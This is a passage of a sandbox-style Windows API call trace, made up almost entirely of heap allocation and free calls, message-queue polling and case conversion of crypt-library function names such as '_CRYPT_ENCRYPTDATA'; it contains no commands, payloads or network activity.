HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.688] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12245) returned 0x795ff8 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.689] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0075.689] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.689] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3d8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12245) returned 0x795ff8 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3f8 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb588 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb5b8 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ada8 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12245) returned 0x7ba498 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.692] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0075.692] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.692] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb5d8 [0075.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e450 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.693] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.693] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.694] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.695] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.696] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e150 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.696] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | 